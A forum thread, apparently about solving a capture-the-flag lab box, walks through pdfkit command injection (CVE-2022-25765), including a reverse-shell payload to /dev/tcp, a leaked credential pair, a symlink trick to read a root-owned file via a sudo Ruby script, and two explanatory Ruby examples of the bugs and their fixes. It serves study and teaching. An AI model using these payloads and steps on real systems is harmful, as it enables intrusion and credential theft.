11231123, November 26, 2022 at 6:57 PM:

Good luck everyone.

We are probably dealing with this: CVE-2022-25765
PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
For shell:
http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
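As an added example (not from the post, the Snyk advisory, or pdfkit's own source), here is a small Ruby model of the command-construction mistake behind CVE-2022-25765 in pdfkit < 0.8.7.2, with `echo` standing in for wkhtmltopdf so it runs offline. `unsafe_command` follows the flawed check as I understand it from the fix (an assumption of this example, not something the thread states): a URL that already contains a `%XX` sequence is treated as pre-escaped and goes unescaped into a single shell string, so the otherwise pointless `%20` in the payload above is what switches escaping off. `safe_command` is the fixed shape, an argv array that `IO.popen` executes without a shell. The `#{'...'}` wrapper in the posted URL is Ruby string-interpolation syntax carried over from the advisory's Ruby PoC; sent through a web form it is just literal characters that the shell ignores inside the double quotes. All names and the payloads are mine.

```ruby
# Added example, not code from the thread, the Snyk advisory, or pdfkit itself.
# It models the command-construction bug behind CVE-2022-25765 (pdfkit < 0.8.7.2)
# with a stand-in binary so it runs offline: `echo` plays the role of wkhtmltopdf.
EXECUTABLE = 'echo'

# Percent-encode everything outside the RFC 2396 unreserved/reserved set,
# the same effect URI::DEFAULT_PARSER.escape has in the real library.
def percent_escape(url)
  url.gsub(%r{[^-_.!~*'()a-zA-Z\d;/?:@&=+$,\[\]]}) do |c|
    c.bytes.map { |b| format('%%%02X', b) }.join
  end
end

# Vulnerable shape (assumption: this mirrors the pre-fix check): the URL is only
# escaped when it does NOT already contain a %XX sequence, because such a URL is
# assumed to be pre-escaped, and the result is interpolated into one shell string
# that IO.popen hands to /bin/sh. The harmless "%20" in the public payload exists
# purely to turn the escaping branch off.
def unsafe_command(url)
  already_escaped = url.match?(/%[0-9A-Fa-f]{2}/)
  shell_url = already_escaped ? url : percent_escape(url)
  %(#{EXECUTABLE} --quiet "#{shell_url}" -)
end

# Fixed shape: an argv array. IO.popen execs the binary directly, no shell,
# so backticks, $(...), quotes and semicolons in the URL are just bytes.
def safe_command(url)
  [EXECUTABLE, '--quiet', url, '-']
end

# Run either form and return what the stand-in binary actually received.
def run(command)
  IO.popen(command, 'r', &:read)
end

# Constructed payload in the shape of the one posted above, with a benign
# command in place of the reverse shell.
PAYLOAD = %q(http://localhost/?name=#{'%20`echo INJECTED`'})
# Same idea without the %20: the escaping branch now runs and neutralises it.
PAYLOAD_NO_ESCAPE_HINT = 'http://localhost/?name=`echo INJECTED`'

# Returns the three outcomes side by side.
def demo
  {
    unsafe_with_hint: run(unsafe_command(PAYLOAD)),
    unsafe_without_hint: run(unsafe_command(PAYLOAD_NO_ESCAPE_HINT)),
    safe: run(safe_command(PAYLOAD))
  }
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |label, output| puts "#{label}: #{output}" }
end
```

With the `%20` present, the unsafe build lets the shell substitute the backtick command and `echo` only ever sees `INJECTED`; without it, the escaping branch turns the backticks into `%60` and nothing runs. The argv form prints the backticks back verbatim no matter what the URL contains, which is the whole fix: never let user-controlled bytes reach a shell parser.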
loosie, November 26, 2022 at 7:24 PM:

> (November 26, 2022, 06:57 PM) 11231123 Wrote:
> Good luck everyone.
> We are probably dealing with this: CVE-2022-25765
> PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
> For shell:
> http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}

Then?

11231123, November 26, 2022 at 7:34 PM:

> (November 26, 2022, 07:24 PM) loosie Wrote:
> > (November 26, 2022, 06:57 PM) 11231123 Wrote:
> > Good luck everyone.
> > We are probably dealing with this: CVE-2022-25765
> > PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
> > For shell:
> > http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
> Then?

ruby@precious:~/.bundle$ cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

loosie, November 26, 2022 at 7:43 PM:

> (November 26, 2022, 07:34 PM) 11231123 Wrote:
> > (November 26, 2022, 07:24 PM) loosie Wrote:
> > > (November 26, 2022, 06:57 PM) 11231123 Wrote:
> > > Good luck everyone.
> > > We are probably dealing with this: CVE-2022-25765
> > > PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
> > > For shell:
> > > http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
> > Then?
> ruby@precious:~/.bundle$ cat config
> ---
> BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

bash: .bundle$: command not found
What happened?

ILoveNSA, November 26, 2022 at 7:44 PM:

> (November 26, 2022, 06:57 PM) 11231123 Wrote:
> Good luck everyone.
> We are probably dealing with this: CVE-2022-25765
> PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
> For shell:
> http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
Privilege escalation is deserialization. How did you figure out what gem and version is being used? Actually, that it is Ruby at all, even.

11231123, November 26, 2022 at 7:44 PM:

For root flag:

henry@precious:~$ ln -s /root/root.txt dependencies.yml
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
Traceback (most recent call last):
/opt/update_dependencies.rb:20:in `<main>': undefined method `each' for "<flag>":String (NoMethodError)

Reply posted November 26, 2022 at 7:46 PM:

https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565
Used payload2, worked like a charm. Pretty straightforward box.

11231123, November 26, 2022 at 7:50 PM:

> (November 26, 2022, 07:44 PM) ILoveNSA Wrote:
> > (November 26, 2022, 06:57 PM) 11231123 Wrote:
> > Good luck everyone.
> > We are probably dealing with this: CVE-2022-25765
> > PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
> > For shell:
> > http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
> Privilege escalation is deserialization. How did you figure out what gem and version is being used? Actually, that it is Ruby at all, even.

On the generated PDFs' metadata you can see: Creator: Generated by pdfkit v0.8.6

loosie, November 26, 2022 at 7:54 PM:

> (November 26, 2022, 07:44 PM) 11231123 Wrote:
> For root flag:
> henry@precious:~$ ln -s /root/root.txt dependencies.yml
> henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
> Traceback (most recent call last):
> /opt/update_dependencies.rb:20:in `<main>': undefined method `each' for "<flag>":String (NoMethodError)

Ok then?

Reply posted November 26, 2022 at 7:55 PM:

> (November 26, 2022, 07:48 PM) loosie Wrote:
> > (November 26, 2022, 07:44 PM) 11231123 Wrote:
> > For root flag:
> > henry@precious:~$ ln -s /root/root.txt dependencies.yml
> > henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
> > Traceback (most recent call last):
> > /opt/update_dependencies.rb:20:in `<main>': undefined method `each' for "<flag>":String (NoMethodError)
> Sorry,
> ruby@precious:~/.bundle$ cat config
> cat config
> ---
> BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"
> but I can't connect.

> (November 26, 2022, 07:34 PM) 11231123 Wrote:
> > (November 26, 2022, 07:24 PM) loosie Wrote:
> > > (November 26, 2022, 06:57 PM) 11231123 Wrote:
> > > Good luck everyone.
> > > We are probably dealing with this: CVE-2022-25765
> > > PoC here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
> > > For shell:
> > > http://localhost/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.XX.XX/8000 0>&1"`'}
> > Then?
> ruby@precious:~/.bundle$ cat config
> ---
> BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

Is that henry's SSH? Why is it not working for me? su henry
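The privilege-escalation route mentioned in the 7:44 and 7:46 replies above (YAML deserialization inside a script run with sudo) is easier to see in code. This is an added example, not the box's /opt/update_dependencies.rb (which the thread never shows) and not the gadget chain from the linked gist: a harmless `Dependency` class stands in for the Gem::* objects a real chain instantiates, `legacy_load` is a helper of mine that always takes the unsafe loader (`YAML.unsafe_load` on Psych 4 / Ruby 3.1+, the old `YAML.load` before that), and all inputs are constructed. It also shows why the symlink trick in the 7:44 post leaks data: the script calls `.each` on whatever the file parsed to, and older Rubies put the receiver's inspect into the resulting NoMethodError message.

```ruby
require 'yaml'

# Added example: a stand-in for the Gem::* objects a real deserialization
# chain (such as the linked gist's) would instantiate. Harmless on purpose.
class Dependency
  attr_reader :name, :version

  def initialize(name, version)
    @name = name
    @version = version
  end
end

# Psych 4 (Ruby 3.1+) made YAML.load the safe loader and moved the old
# behaviour to YAML.unsafe_load; earlier Rubies only have the unsafe YAML.load.
# This helper always takes the unsafe path, which is the path a script running
# under sudo must never take on a file its caller controls.
def legacy_load(yaml)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(yaml) : YAML.load(yaml)
end

# Vulnerable shape: trusts both the contents and the type of the result.
# A "!ruby/object:Foo" tag becomes a Foo built with allocate and instance
# variables set straight from the document; no constructor runs.
def legacy_dependencies(yaml)
  legacy_load(yaml)
end

# Models the loop the thread's traceback points at: iterate over whatever the
# file parsed to. A String or a tagged object has no #each, so a NoMethodError
# is raised; older Rubies include the receiver's inspect in that message, i.e.
# the file contents, which is how the symlinked root.txt ended up on screen.
def iterate_legacy(yaml)
  legacy_dependencies(yaml).each { |gem_name, version| [gem_name, version] }
  :ok
rescue NoMethodError => e
  e.class
end

# Hardened shape: safe_load only builds scalars, arrays and hashes (plus any
# classes explicitly permitted) and rejects !ruby tags, and the caller checks
# the shape it expects before touching it. The ArgumentError carries nothing
# from the file.
def safe_dependencies(yaml)
  data = YAML.safe_load(yaml)
  raise ArgumentError, 'dependencies.yml must map gem name => version' unless data.is_a?(Hash)
  data
end

# Constructed inputs (not from the box).
PLAIN_YAML = "pdfkit: 0.8.6\nwebrick: 1.7.0\n"
TAGGED_YAML = <<~YAML
  --- !ruby/object:Dependency
  name: libfoo
  version: 1.2.3
YAML
# Stands in for a dependencies.yml that is really a symlink to a secret file.
SYMLINKED_SECRET = "secret-constructed-example-7a3f\n"

if __FILE__ == $PROGRAM_NAME
  puts legacy_dependencies(TAGGED_YAML).inspect   # a Dependency, not a Hash
  puts iterate_legacy(SYMLINKED_SECRET).inspect   # NoMethodError
  puts safe_dependencies(PLAIN_YAML).inspect
  begin
    safe_dependencies(TAGGED_YAML)
  rescue Psych::DisallowedClass => e
    puts "rejected: #{e.message}"
  end
end
```

The hardened loader addresses both symptoms at once: `safe_load` refuses any `!ruby/object:` tag with `Psych::DisallowedClass`, and the explicit Hash check turns a symlinked secret into an ArgumentError whose message contains nothing from the file. The underlying bug is still a root-run script reading a file that the invoking user can replace; the loader change only limits what that replacement can do.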